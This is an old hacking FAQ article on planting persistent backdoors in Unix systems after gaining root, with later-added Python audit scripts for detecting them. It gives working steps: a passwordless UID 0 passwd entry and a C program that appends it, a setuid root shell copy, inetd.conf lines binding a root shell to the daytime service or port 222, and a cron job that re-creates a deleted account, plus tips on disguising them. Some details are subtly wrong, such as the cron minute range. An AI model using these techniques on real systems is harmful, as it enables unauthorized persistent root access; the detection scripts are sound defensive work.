Wang Products

FAQ Article: Leaving *nix Backdoors

What is a backdoor? Well, a backdoor is some way into a system other than using the normal procedure (normal procedure could be the login prompt, or an authentication routine). Backdoors can exist for a number of reasons:

  • Bad coding - When the program is released, there could be a flaw in it that allows you to bypass the standard authentication procedure and get access. This will be due to the programmer's error, or not doing enough security checking on the program :)

  • Hackers - If a hacker breaks into a system, they want to leave something on the system to ensure that they can easily get back in again without having to risk hacking the box again. This is when they would create a backdoor in the system, which would allow them to do something special and get round all the standard login processes - and go straight into an admin account.

  • Dumb Programmers - For some reason, some makers of software etc. decide that they are going to put their own backdoors into their software. Why? Who knows - power I guess...or so they know that they can get into any computer using their software. Problem is, as soon as a real coder takes a look at the program, they see the backdoor and let everyone else in the world know...hence making the program too dangerous for people to use.

There are many different types of backdoor. I don't want to go too in depth into the types, because I think examples will be better. A trojan (discussed in earlier volumes) is a backdoor - programs like Sub Seven or Netbus etc. allow people to get into your box.

However, most backdoors hackers leave will simply involve creating new accounts on the system (with admin privileges) or turning on a feature of the program/Operating System which allows them to connect to it in a different way. These are the kind of backdoors I want to tackle today.

These will focus mainly on Unix operating systems, simply because Windows backdoors are mostly just what I have said - trojans. They require no skill (unless you take the time to write your own). So...we will look at the complex world of Unix backdoors - and many different techniques of creating backdoors within a system.

** Please Note: I am not encouraging the creation of backdoors - I am simply demonstrating how they can exist - which in turn will help admin's to detect them! **


Backdoor idea 1 - the passwd entry

The first method we will look at is by far the simplest. Ok, you have read the last hack faq volume's topic about CGI exploits. Let's say you choose to use that information on a web site somewhere, and you got the password file from the server.

After a few minutes of cracking the password file with JTR (John the Ripper, a Unix password brute forcer) you telnet in to the server and log in as root. Bingo...now, what should you do?

Ideally - don't even log in :) - just inform the system administrator of the bug, and let it be...but, for the purposes of this tutorial - we are going to leave a backdoor so that we can get back in with a bit more stealth some other time.

For the first backdoor, we are just going to add a new account into the system. Ideally, you should add an account with a username that isn't obvious (basically what I am saying is - don't use the username Haxor, or rooter - or anything similar!).

To add the account, the best way is to add a UID 0 account to the /etc/passwd file. You can do this manually by opening the file in a Unix text editor (such as pico or vi) and adding a line like:


Simon::0:0:Simon Black:/root:/bin/sh


That would add an account with no password and the username "Simon". If you can't be bothered to add it manually in, you can also run a quick c program to do it, like:


#include <stdio.h>

int main(void)
{
    FILE *fd;
    /* open /etc/passwd for appending (only works as root) */
    fd = fopen("/etc/passwd", "a+");
    if (fd == NULL)
        return 1;
    fprintf(fd, "Simon::0:0:Simon Black:/root:/bin/sh\n");
    fclose(fd);
    return 0;
}


That just automates the procedure, and let's face it - using a program like that you will be in and out a lot quicker. Perhaps for a task that small, you may say a program is not necessary...but for more complex backdoors - you will see that writing a program is often necessary :)

Now, the problem with this backdoor is that it is very obvious. Next time the admin checks the file, a new root account will leap out of the screen at him - and it will be obvious that the server has been hacked. So, let's look at something a little better.
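As an added defender-side example (not part of the original article), here is a short Python audit that reads a passwd file and flags exactly this kind of entry; the sample file is constructed, with the Simon line from above as its last entry.

```python
# Constructed sample of an /etc/passwd file (not taken from a real host);
# the last line is the backdoor entry shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
simon:x:1001:1001:Simon Black:/home/simon:/bin/bash
Simon::0:0:Simon Black:/root:/bin/sh
"""


def audit_passwd(text):
    """Return a list of (line_no, user, reason) findings for a passwd file.

    Flags any UID 0 account other than root, any entry with an empty
    password field (login with no password at all, no /etc/shadow lookup),
    a UID shared by two names, and lines without the seven fields.
    """
    findings = []
    seen_uids = {}
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed: expected 7 fields"))
            continue
        user, password, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((line_no, user, "non-numeric UID"))
            continue
        if int(uid) == 0 and user != "root":
            findings.append((line_no, user, "extra UID 0 account"))
        if password == "":
            findings.append((line_no, user, "empty password field"))
        if int(uid) != 0 and uid in seen_uids:
            findings.append((line_no, user, "UID shared with " + seen_uids[uid]))
        seen_uids.setdefault(uid, user)
    return findings


if __name__ == "__main__":
    for line_no, user, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {user}: {reason}")
```

Run it against a copy of the real file taken before and after a suspected break-in and the new root account (or the blank password field) is the first thing it reports.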


Backdoor idea 2 - setuid/setgid shells

This is a popular one, as it is quick and not too messy...but still not great. The hacker simply makes a copy of /bin/sh (or any shell, could be /bin/bash), sets its ownership to the user or group root, and then sets it setuid or setgid. Then, whenever they run the shell it runs with root privileges.

This program automates the task of making this exploit:


#include <stdlib.h>

int main(void)
{
    /* copy the shell, make it root-owned, then set the setuid bit (4755) */
    system("cp /bin/sh /tmp/out");
    system("chown root.root /tmp/out");
    system("chmod 4755 /tmp/out");
    return 0;
}


You will notice it places the backdoor in /tmp, which is probably not a great idea - as most systems run cronjobs every now and then or reboot to clean out /tmp. However, this kind of backdoor can easily be detected by the command:


find / -perm +6000


The output, compared to a previous list of setuid and setgid binaries should show any additions to the system. To avoid this, the hacker can label their setuid shell as a normal (but unused) setuid program such as /sbin/restore.
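An added example, not from the article: a Python baseline-and-compare for setuid/setgid binaries that also hashes each file, so a shell copied over an existing setuid program like /sbin/restore still shows up even though the path was already in the baseline. The scratch-directory scenario in demo() is constructed.

```python
import hashlib
import os
import stat
import tempfile

def scan_setid(root):
    """Return {path: sha256} for each regular file under `root` with the setuid
    or setgid bit set (GNU find now spells the check above `-perm /6000`)."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or already gone; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                with open(path, "rb") as fh:
                    found[path] = hashlib.sha256(fh.read()).hexdigest()
    return found

def compare_setid(baseline, current):
    """Diff two scans into (added, removed, changed). `changed` is what catches
    the /sbin/restore trick: same path, but the contents no longer match."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    changed = sorted(p for p in current if p in baseline and baseline[p] != current[p])
    return added, removed, changed

def _write(path, data, mode):
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)  # chmod after writing, since a write clears setuid

def demo():
    """Constructed scenario in a scratch directory (no real system files):
    baseline with one setuid 'restore'; then a shell copy overwrites it
    and a second setuid copy appears as 'out'."""
    root = tempfile.mkdtemp()
    restore, out = os.path.join(root, "restore"), os.path.join(root, "out")
    _write(restore, b"genuine restore binary", 0o4755)
    _write(os.path.join(root, "ls"), b"ordinary binary", 0o755)
    baseline = scan_setid(root)
    _write(restore, b"copy of /bin/sh", 0o4755)
    _write(out, b"copy of /bin/sh", 0o4755)
    added, removed, changed = compare_setid(baseline, scan_setid(root))
    return ([os.path.basename(p) for p in added], removed,
            [os.path.basename(p) for p in changed])
```

On a real host, save the scan_setid("/") result from a known-good state and compare against it on a schedule; the added and changed lists are the ones to investigate.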


Backdoor idea 3 - Altering Services

Ok, let's look at something a bit better...remotely accessible backdoors. The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file looks something like this:


(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd


Here is an explanation of each number:

1. This is the daemon name of the service that appears in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with.

2. This will tell inetd what type of connection to use when the session is established. TCP uses streams, and UDP (the connectionless protocol) uses datagrams.

3. Protocol field, TCP or UDP.

4. This tells inetd whether it must wait for the server to finish before handling another connection. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections.

5. This is the user the daemon is run as.

6. Program to run when a connection arrives.

7. This is the actual command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7). So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. You could make it spawn a program that adds a UID 0 account, or creates a suid shell.

To take over a service like daytime (something which you can usually access by connecting to a server on port 13 - it just tells you the date and time on the server) would be a fun idea :) Imagine - instead of telling you the time - it would send you straight into a root shell! This backdoor could be placed by doing the following to the /etc/inetd.conf:

Find the line that is similar to this:


daytime stream tcp nowait root internal


And change it to:


daytime stream tcp nowait /bin/sh sh -i


Then, before this change becomes active the inetd needs to be restarted...so type:


kill -HUP inetd



Backdoor idea 4 - Your own service :)

This is very similar to the last technique, but this describes how you could make your own service...rather than just alter an existing one.

The only real difference is that you need to add a line instead of just altering a line, and also you will need to alter /etc/services as well as /etc/inetd.conf. The format of the /etc/services file is:


(1) (2)/(3) (4)
smtp 25/tcp mail


Here is an explanation of each number:

1. This is the service

2. This is the port number

3. This is the protocol type the service expects

4. This is the common name associated with the service

So, to add a backdoor - the hacker might do something like:

* Add a line to /etc/services:


wang 222/tcp wang


* Add a line to /etc/inetd.conf:


wang stream tcp nowait /bin/sh sh -i


* Restart inetd exactly the same as the last technique.

And bingo :) - telnet to port 222 and you are dropped into a root shell. Notice how the lines added to each file are consistent with each other.

Also - I have an even better example of this for you. Palmito has written a backdoor script specially for this volume. It is written in perl, and you will find it along with this volume in a file called service.pl. The idea would be to put this on the compromised system, and run it.

This would automate the above technique and create a new backdoor for you (it also does technique 1 for you as well). I recommend you take the time to look at the code and see how it works (or learn perl, and then take a look at the source!).
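An added example covering both of the inetd techniques above (not from the article, and not Palmito's service.pl): a Python check over inetd.conf and /etc/services, using constructed sample files that include the daytime and wang lines exactly as written above. The audit reports a path sitting in the user field, a built-in service handed to an external program, a shell used as the handler, and any service name/port that a saved copy of /etc/services did not have.

```python
import os

# Services inetd serves itself ("internal"); a line that hands one of them to
# an external program is the daytime trick from the text.
INTERNAL_SERVICES = {"echo", "discard", "daytime", "chargen", "time"}
SHELLS = {"sh", "bash", "ksh", "csh", "zsh", "perl", "python"}

# Constructed sample files (not from a real host). The last two inetd lines
# and the last services line are the entries from the text, as written.
SAMPLE_INETD = """\
ftp     stream tcp nowait root /usr/sbin/ftpd   ftpd
talk    dgram  udp wait   root /usr/sbin/ntalkd ntalkd
daytime stream tcp nowait /bin/sh sh -i
wang    stream tcp nowait /bin/sh sh -i
"""
BASELINE_SERVICES = "ftp 21/tcp\nsmtp 25/tcp mail\ndaytime 13/tcp\n"
CURRENT_SERVICES = BASELINE_SERVICES + "wang 222/tcp wang\n"

def audit_inetd(text):
    """Return (line_no, service, reason) findings for an inetd.conf."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        f = raw.split()
        if len(f) < 6:
            findings.append((line_no, f[0], "malformed: fewer than 6 fields"))
            continue
        name, user, server, args = f[0], f[4], f[5], f[6:]
        if "/" in user:
            findings.append((line_no, name, "user field is a path, not a user"))
        if name in INTERNAL_SERVICES and server != "internal":
            findings.append((line_no, name, "built-in service now runs a program"))
        if os.path.basename(server) in SHELLS or (args and args[0] in SHELLS):
            findings.append((line_no, name, "handler is a shell or interpreter"))
    return findings

def new_services(baseline, current):
    """Return (name, port/proto) pairs in `current` that the baseline lacks."""
    def entries(text):
        return {tuple(l.split()[:2]) for l in text.splitlines()
                if l.strip() and not l.startswith("#")}
    return sorted(entries(current) - entries(baseline))

if __name__ == "__main__":
    print(audit_inetd(SAMPLE_INETD))
    print(new_services(BASELINE_SERVICES, CURRENT_SERVICES))
```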


Backdoor idea 5 - Timed Backdoors

For this backdoor we will look at something the admin has (which, having rooted the box, the hacker now has!) - Crontab. Crontab is used to create schedules, i.e. events which occur at specified intervals or times during the day/month/year. So, this is perfect for a backdoor - imagine the power the hacker can gain with timed backdoors :)

For example, imagine a situation where a hacker has rooted your Linux system, and placed a backdoor program (say a simple suid shell) and set Crontab to execute it only at midnight, when he knows you're not around...powerful!

The root Crontab jobs are located in /var/spool/crontab/root and can be manually edited. The Crontab lines will look something like this:


(1) (2) (3) (4) (5) (6)
0 0 * * 5 /usr/bin/updatedb


Here is an explanation of each number:

1. Minute (0-60)
2. Hour (0-23)
3. Day of month (1-31)
4. Month (1-12)
5. Day of week (1-7)
6. The command to execute.

So...the example file entry I used above would execute on a Friday. Now use your imagination! You can manually add anything you want into the /var/spool/crontab/root file. For example, I have seen examples where people have added a new account into the /etc/passwd file, and then written a small script which goes through the passwd file to check whether their account is still there (and put it back in if it isn't) - then, they set Crontab to run this program every day.

The result? Well...if the admin finds their special backdoor account and removes it...crontab will run their program, which in turn will re-create the account.
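An added example, not part of the article: a Python review of a root crontab, using a constructed sample that starts with the updatedb line above and adds the two patterns the text describes (a job run from /tmp, and one that rewrites /etc/passwd). The writable-directory and sensitive-file lists are assumptions to adjust per host.

```python
# Constructed root crontab (not from a real host). Line 1 is the updatedb
# entry from the text; lines 2 and 3 are the kind of entries the text
# describes: a job that runs from /tmp, and one that rewrites /etc/passwd.
SAMPLE_CRONTAB = """\
0 0 * * 5 /usr/bin/updatedb
*/10 * * * * /tmp/.x/keep.sh
0 0 * * * /usr/local/bin/fixacct.sh >> /etc/passwd
"""

# Places an unprivileged user can write, and files a backdoor wants to edit
# (assumed lists; extend them for the host being checked).
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/etc/inetd.conf", "/etc/services")
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]  # cron: 0 and 7 are Sunday

def day_name(dow):
    """Map a plain day-of-week field to a name; ranges, lists and '*' pass through."""
    return DAYS[int(dow)] if dow.isdigit() and int(dow) < 8 else dow

def audit_crontab(text):
    """Return (line_no, reason) findings for a crontab in five-field format."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#") or "=" in raw.split()[0]:
            continue  # blank, comment, or VAR=value line
        f = raw.split(None, 5)
        if len(f) < 6:
            findings.append((line_no, "malformed: fewer than 6 fields"))
            continue
        _minute, _hour, _dom, _month, _dow, command = f
        for token in command.split():
            if token.startswith(WRITABLE_DIRS):
                findings.append((line_no, "runs from a user-writable directory: " + token))
        for path in SENSITIVE_FILES:
            if path in command:
                findings.append((line_no, "touches a sensitive file: " + path))
    return findings

if __name__ == "__main__":
    for line_no, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}")
    print("line 1 fires on", day_name(SAMPLE_CRONTAB.splitlines()[0].split()[4]))
```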


Backdoor idea 6 - Re-Exploitation

Most systems have at least a few exploitable holes. If the method the hacker used to get root in the first place is not patched, they may just decide to keep on re-exploiting the hole (as opposed to putting a backdoor in). This would be best used on large networks, such as colleges/universities (which tend to have hundreds and sometimes thousands of poorly maintained UNIX machines on their networks).

Well...there you go :) - a little look into the world of backdoors...something that both hackers and admins need to know about.
Comments
Comment by OverFIeND - 03-09-2005

This is a brilliant and insightful article, especially for people new and inexperienced with linux (me) well done :)
